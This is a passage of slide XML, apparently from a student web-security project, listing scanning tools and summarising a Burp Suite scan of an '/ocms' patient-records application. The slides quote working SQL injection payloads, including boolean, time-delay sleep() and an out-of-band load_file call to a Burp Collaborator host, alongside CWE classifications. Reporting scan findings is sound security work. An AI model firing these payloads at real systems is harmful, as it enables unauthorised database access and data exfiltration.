-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1" y="0"/>
-            <a:ext cx="3070172" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:schemeClr val="tx2"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp useBgFill="1">
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="Rectangle 9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D65299F-028F-4AFC-B46A-8DB33E20FE4A}"/>
-              </a:ext>
-              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
-                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:extLst>
-              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
-                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
-              </p:ext>
-            </p:extLst>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3070172" y="0"/>
-            <a:ext cx="9121828" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="Oval 11">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC87F6E-526A-49B5-995D-42DB656594C9}"/>
-              </a:ext>
-              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
-                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:extLst>
-              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
-                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
-              </p:ext>
-            </p:extLst>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1117423" y="1443035"/>
-            <a:ext cx="3971932" cy="3971930"/>
-          </a:xfrm>
-          <a:prstGeom prst="ellipse">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="FFFFFF"/>
-          </a:solidFill>
-          <a:ln w="31750">
-            <a:solidFill>
-              <a:schemeClr val="accent2">
-                <a:lumMod val="75000"/>
-              </a:schemeClr>
-            </a:solidFill>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67FB58CA-5A5F-4326-A227-6806389BC5FC}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1260873" y="1586484"/>
-            <a:ext cx="3685032" cy="3685032"/>
-          </a:xfrm>
-          <a:prstGeom prst="ellipse">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:schemeClr val="accent2">
-              <a:lumMod val="75000"/>
-            </a:schemeClr>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" sz="3000" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Analysis Tools</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF07E72F-443B-4430-B4EF-193F1578C80F}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5701005" y="83976"/>
-            <a:ext cx="6083558" cy="6774024"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr">
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Burp Suite Professional</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>OWASP ZAP</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>Arachni</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Wapiti</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>Nikto</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>SQLmap</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>VCG</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Vega Vulnerability Scanner</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1"/>
-              <a:t>Github</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t> Repository of the project: https://github.com/ar4f4t/INSE-6140-Project </a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042174031"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44699CC6-1D30-417E-879C-A91EA525A8B6}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2013022" y="79205"/>
-            <a:ext cx="7729728" cy="646850"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Burp suite Report Analysis</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7516D6CC-8548-46EC-ADC8-DC8A8D60E062}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="370514" y="1157681"/>
-            <a:ext cx="11450972" cy="5297689"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>SQL injection: </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>ocms</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/admin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>pageViewMembers.php?searchMembers</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=145817&amp;groupID=0&amp;status=138707587%20or%209037%3d09037&amp;searchField=0&amp;page=1  </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Error Message: payload 38707587 or 9037=09037</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>ocms</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/hooks/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>patient_prescription.php?search</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>=90191398963262'%20or%208004%3d8004--%20</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Error Message: 98963262' or 8004=8004--</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" b="1" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>ocms</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/hooks/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>patient_diagnosis.php</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t> [Method : POST]</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Code Injection: '+(select </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>load_file</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>('\\\\c0df40ldznkv8kfgxp3j0k0spjvcj4as1vpncd02.burpcollaborator.net\\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>jby</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>'))+’ interacted with an external domain [</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>DNS lookup of type A -IP address 24.201.141.186]</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Error Message: 22601788' or 2388=2388--</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="arabicPeriod"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>ocms</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>/hooks/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>patient_history.php</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>  [Method: POST]</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Error Message: payload 95747182' or 7702=7702—</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="571500" lvl="1" indent="-342900">
-              <a:buFont typeface="+mj-lt"/>
-              <a:buAutoNum type="alphaLcParenR"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Time Delay: payload </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>'+(select*from(select(sleep(20)))a)+’ caused 20705ms response to the request. </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-GB" b="1" u="sng" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>Vulnerability classifications:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>    CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>    CWE-94: Improper Control of Generation of Code ('Code Injection')</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-GB" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="404040"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>    CWE-116: Improper Encoding or Escaping of Output</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="404040"/>
-              </a:solidFill>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5435089"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49278B93-F714-4E58-8C45-27F33B53A9FE}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2231136" y="87652"/>
-            <a:ext cx="7729728" cy="649504"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Vega Report Analysis</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FFBE2A-804C-4B54-BE93-7D82BBD2DD23}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noGrp="1" noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4892816" y="849086"/>
-            <a:ext cx="7186488" cy="5921262"/>
-          </a:xfrm>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E26A76-D97B-44AB-A427-EB78D2D542F6}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="412381" y="1248333"/>
-            <a:ext cx="4453079" cy="3139321"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="none" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
